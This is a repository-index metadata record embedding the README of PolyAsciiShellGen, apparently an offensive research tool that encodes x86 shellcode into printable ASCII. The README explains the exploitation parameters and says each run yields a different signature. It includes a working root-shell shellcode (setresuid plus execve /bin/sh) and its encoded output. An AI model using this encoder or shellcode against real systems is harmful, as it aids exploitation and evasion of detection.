{"id":15048949,"url":"https://github.com/vincentdary/polyasciishellgen","last_synced_at":"2025-04-10T01:40:41.979Z","repository":{"id":75312243,"uuid":"38923591","full_name":"VincentDary/PolyAsciiShellGen","owner":"VincentDary","description":"Caezar ASCII Shellcode Generator (x86, 32 bits)","archived":false,"fork":false,"pushed_at":"2020-12-19T17:21:36.000Z","size":41,"stargazers_count":31,"open_issues_count":0,"forks_count":8,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-24T03:22:23.349Z","etag":null,"topics":["32-bit","c","c-language","encoder","shellcode","x86","zero-dependency"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/VincentDary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2015-07-11T11:30:08.000Z","updated_at":"2024-10-23T16:38:26.000Z","dependencies_parsed_at":"2023-06-06T02:45:19.339Z","dependency_job_id":null,"html_url":"https://github.com/VincentDary/PolyAsciiShellGen","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VincentDary%2FPolyAsciiShellGen","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VincentDary%2FPolyAsciiShellGen/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VincentDary%2FPolyAsciiShellGen/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VincentDary%2FPolyAsciiShellGen/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/VincentDary","download_url":"https://codeload.github.com/VincentDary/PolyAsciiShellGen/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248142004,"owners_count":21054574,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["32-bit","c","c-language","encoder","shellcode","x86","zero-dependency"],"created_at":"2024-09-24T21:17:17.937Z","updated_at":"2025-04-10T01:40:41.954Z","avatar_url":"https://github.com/VincentDary.png","language":"C","readme":"# PolyAsciiShellGen: Caezar ASCII Shellcode Generator\n\nFull description and demonstration on this blog post: https://vincentdary.github.io/blog-posts/polyasciishellgen-caezar-ascii-shellcode-generator/index.html\n\n  - [Build](#build)\n  - [Usage](#usage)\n  - [Options](#options)\n  - [Result](#result)\n  - [Return Value](#return-value)\n  - [Exemple](#exemple)\n\n\n## PolyAsciiShellGen\nPolyAsciiShellGen is an experimental ASCII shellcode generator based on\nthe part II of the *Riley \"Caezar\" Eller*'s paper. The program take a classic\nshellcode in entry and automates the shellcode encoding process into ASCII\ncaracteres and assemble an ASCII shellcode able to decode, load and\nexecute the original shellcode.\n\n\n### Build\nClone PolyAsciiShellGen from\n[my Github repository [3]](https://github.com/VincentDary/PolyAsciiShellGen)\nand build it.\n\n```text\n$ git clone https://github.com/VincentDary/PolyAsciiShellGen.git\n$ cd PolyAsciiShellGen\n$ make \u0026\u0026 make clean\n```\n\n### Usage\n```text\n$ ./PolyAsciiShellGen\nusage: PolyAsciiShellGen \u003cesp offset\u003e \u003cnop sleed factor N * 4 NOPS\u003e \u003cshellcode \"\\xOP\\xOP\"...\u003e\n```\n\n### Options\n**`\u003cesp offset\u003e`**\n\nThe *`esp offset`* parameter is a 32 bit integer, positive or negative.\nWhen the generated ASCII shellcode is executed it starts to add the\n*`esp offset`* to ESP in order to set the register position after its code\nwith enough space to build the decoded shellcode as a bridge to the code of the\nASCII shellcode. This value is generaly deduct during a pre-exploitation\ndebugging session. If a NOP sleed is add before the decoded shellcode via the\n*`NOP sleed factor`*, the *`esp offset`* value can have a margin of error\naccording the size of the NOP sleed use. Here the method to compute the\n*`esp offset`*.\n\n```text\n esp_offset = @shellcode_ascii_start_address - @esp_address\n              + ascii_shellcode_size\n              + original_shellcode_size\n```\n\nNote: the `ascii_shellcode_size` must be padded on a 32-bit boundary.\n\n**`\u003cnop sleed factor\u003e`**\n\nThe *`nop sleed factor`* parameter is a 32 bit unsigned integer use as a NOP\nsleed multiplier to add an extra NOP sleed before the first instructions of the\ndecoded shellcode in order to reliable the decoded shellcode execution. This\nfactor is multiplied to four NOP instructions. So if N=4, 4*4=16 NOP\ninstructions are added before the shellcode.\n\n**`\u003cshellcode\u003e`**\n\nThe `shellcode` parameters is the shellcode to encode in escaping format\n`...\\xcd\\x80...` .If the lenght of the shellcode is not a multiplier of four bytes, it\nis padded with extra NOP bytes in order to pass an exploit code aligned on a 32-bit\nboundary to the underlying ASCII shellcode generator.\n\n\n### Result\nPolyAsciiShellGen print the resulting ASCII shellcode on the standard output. The\nASCII charset use for the ASCII shellcode building is the following.\n\n```text\n %_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-\n```\n\nTo encode the original shellcode, the underlying encoder uses values generated\nrandomly at each execution. So, the printable shellcodes generated have a\ndifferent signatures from the original shellcode at each new generation.\n\n\n### Return Value\nThe command returns 0 if the ASCII shellcode generation is successful or 1 if\nit fails.\n\n\n### Exemple\nHere an example with a `setresuid(0,0,0); execve(/bin//sh,0,0)` shellcode.\n\n```text\n$ ./PolyAsciiShellGen -270  10  \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\xb0\\xa4\\xcd\\x80\\x31\\xc0\\xb0\\x0b\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x51\\x89\\xe2\\x53\\x89\\xe1\\xcd\\x80\"\nTX-KKKK-KKKK-xjiiP\\%0000%AAAA-9%%%-GJJJP-hhNh-th3%-Q6-5P-yyyZ-yZy6-L6---2-8-P-7KKd-%Kdz-%RkzP-xxxx-GGGx-0AFiP-OOOO-jOwO-iaraP-NN%N-a%%a-q44tP-%SS0-%SL5-7uC%P-FkFF-9pUhP-XXXX-XXXX-PXOFP-AAAj-0w2j-0w-vPPPPPPPPPP\n```\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvincentdary%2Fpolyasciishellgen","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvincentdary%2Fpolyasciishellgen","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvincentdary%2Fpolyasciishellgen/lists"}